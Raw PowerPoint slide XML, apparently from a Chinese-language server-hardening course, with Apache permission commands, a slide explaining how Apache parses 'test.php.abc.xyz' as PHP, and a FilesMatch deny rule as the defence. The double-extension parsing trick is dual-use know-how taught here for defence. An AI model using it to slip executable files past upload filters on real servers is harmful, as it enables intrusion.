                <a:lnTo>
                  <a:pt x="5476621" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379094">
                <a:moveTo>
                  <a:pt x="5481383" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5476621" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955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5481955" h="379094">
                <a:moveTo>
                  <a:pt x="547185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5471858" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379094">
                <a:moveTo>
                  <a:pt x="5481383" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548138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35167" y="2065235"/>
            <a:ext cx="5473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chown </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-R </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>apache 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apache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/var/www/html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7555" y="2744723"/>
            <a:ext cx="5471160" cy="370840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5471159" h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471159" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471159" y="370331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3703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62844" y="2740418"/>
            <a:ext cx="5481955" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5481955" h="379094">
                <a:moveTo>
                  <a:pt x="547662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51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376897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5476621" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548138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5481383" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481154" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5480481" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5479427" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5478094" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955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481955" h="379094">
                <a:moveTo>
                  <a:pt x="547185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471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379094">
                <a:moveTo>
                  <a:pt x="5471858" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379094">
                <a:moveTo>
                  <a:pt x="5481383" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5476621" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955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5481955" h="379094">
                <a:moveTo>
                  <a:pt x="547185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5471858" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379094">
                <a:moveTo>
                  <a:pt x="5481383" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548138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67555" y="2766771"/>
            <a:ext cx="547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find -type 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5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-exec chmod 750 {}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\;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67555" y="3194304"/>
            <a:ext cx="5471160" cy="370840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5471159" h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471159" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471159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2844" y="3190125"/>
            <a:ext cx="5481955" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5481955" h="379095">
                <a:moveTo>
                  <a:pt x="547662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39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376885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5476621" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548138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5481383" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481154" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5480481" y="376885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5479427" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5478094" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="37909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481955" h="379095">
                <a:moveTo>
                  <a:pt x="547185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471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379095">
                <a:moveTo>
                  <a:pt x="5471858" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379095">
                <a:moveTo>
                  <a:pt x="5481383" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5476621" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379095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5481955" h="379095">
                <a:moveTo>
                  <a:pt x="547185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5471858" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379095">
                <a:moveTo>
                  <a:pt x="5481383" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548138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7555" y="3216478"/>
            <a:ext cx="547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#find -not -type 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5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-exec chmod 640 {}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\;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7555" y="4014215"/>
            <a:ext cx="5471160" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5471159" h="368935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471159" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471159" y="368808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36880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2844" y="4009161"/>
            <a:ext cx="5481955" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5481955" h="379095">
                <a:moveTo>
                  <a:pt x="547662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39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376885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5476621" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548138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5481383" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481154" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5480481" y="376885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5479427" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5478094" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="37909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481955" h="379095">
                <a:moveTo>
                  <a:pt x="547185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471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379095">
                <a:moveTo>
                  <a:pt x="5471858" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379095">
                <a:moveTo>
                  <a:pt x="5481383" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5476621" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379095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5481955" h="379095">
                <a:moveTo>
                  <a:pt x="547185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5471858" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5481955" h="379095">
                <a:moveTo>
                  <a:pt x="5481383" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5471858" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476621" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5481383" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548138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7555" y="4035514"/>
            <a:ext cx="547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#chmod 770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yourdir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5856" y="3811270"/>
            <a:ext cx="2676525" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2676525" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2676144" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267614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470785" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2470785" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2470404" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247040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480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dirty="0"/>
              <a:t>服务器文件名解析漏洞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850" y="1596452"/>
            <a:ext cx="15699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漏洞原理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50" y="3201733"/>
            <a:ext cx="14937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防御方法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0404" y="1575816"/>
            <a:ext cx="7045959" cy="1201420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7045959" h="1201420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7045452" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045452" y="1200912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12009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5654" y="1571371"/>
            <a:ext cx="7055484" cy="1210310"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7055484" h="1210310">
                <a:moveTo>
                  <a:pt x="7050138" y="1209852"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1209852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1209624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1208951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1207896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1206563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705490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200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054659" y="1206563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7053986" y="1207896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7052932" y="1208951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7051611" y="1209624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="1209852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="121031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7055484" h="1210310">
                <a:moveTo>
                  <a:pt x="704537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7045375" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="1210310">
                <a:moveTo>
                  <a:pt x="7045375" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7045375" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="1210310">
                <a:moveTo>
                  <a:pt x="7054900" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7050138" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="1210310">
                <a:moveTo>
                  <a:pt x="9525" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="1210310">
                <a:moveTo>
                  <a:pt x="7045375" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="1205090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="1210310">
                <a:moveTo>
                  <a:pt x="7054900" y="1205090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7045375" y="1205090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="1200327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="1205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0404" y="1597723"/>
            <a:ext cx="704595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755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Apache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解析文件的规则是从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右</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>到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左</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>开始判断解析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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>如果后缀名为不可 识别文件解析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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>就再往左判断。比如</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="8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test.php.abc.xyz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spc="8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“.abc”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“.xyz”  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>这两种后缀是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>不可识别解析</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>,apache</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>就会把</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>test.php.abc.xyz  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>解析成</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>。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70404" y="3115055"/>
            <a:ext cx="7045959" cy="1754505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7045959" h="1754504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7045452" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045452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5654" y="3110445"/>
            <a:ext cx="7055484" cy="1764030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7055484" h="1764029">
                <a:moveTo>
                  <a:pt x="7050138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68" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241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7050138" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705490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7054900" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054659" y="1760562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7053986" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7052932" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7051611" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="1763852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="176402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7055484" h="1764029">
                <a:moveTo>
                  <a:pt x="704537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7045375" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="1764029">
                <a:moveTo>
                  <a:pt x="7045375" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7045375" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="1764029">
                <a:moveTo>
                  <a:pt x="7054900" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7050138" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484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7055484" h="1764029">
                <a:moveTo>
                  <a:pt x="7045375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7045375" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7045375" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7055484" h="1764029">
                <a:moveTo>
                  <a:pt x="7054900" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7045375" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7050138" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7054900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70404" y="3136798"/>
            <a:ext cx="7045959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882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oto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>httpd-vhosts.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>中加入以下语句，从而禁止文件名格 式为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>*.php.*</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的访问权限：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440" marR="27940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&lt;FilesMatch ".(php.|php3.|php4.|php5.)"&gt;  Order </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Deny,Allow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Deny from all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&lt;/FilesMatch&gt;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225" y="610985"/>
            <a:ext cx="8649392" cy="806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0981" y="6374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</a:rPr>
              <a:t>模块说</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>明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39851" y="1452250"/>
            <a:ext cx="9570949" cy="1560042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通过本部分的学习，学员应当：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了解中间件的基本概念和加固方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法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>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>掌握主流中间件的权限配置，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>降低</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>漏洞风</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
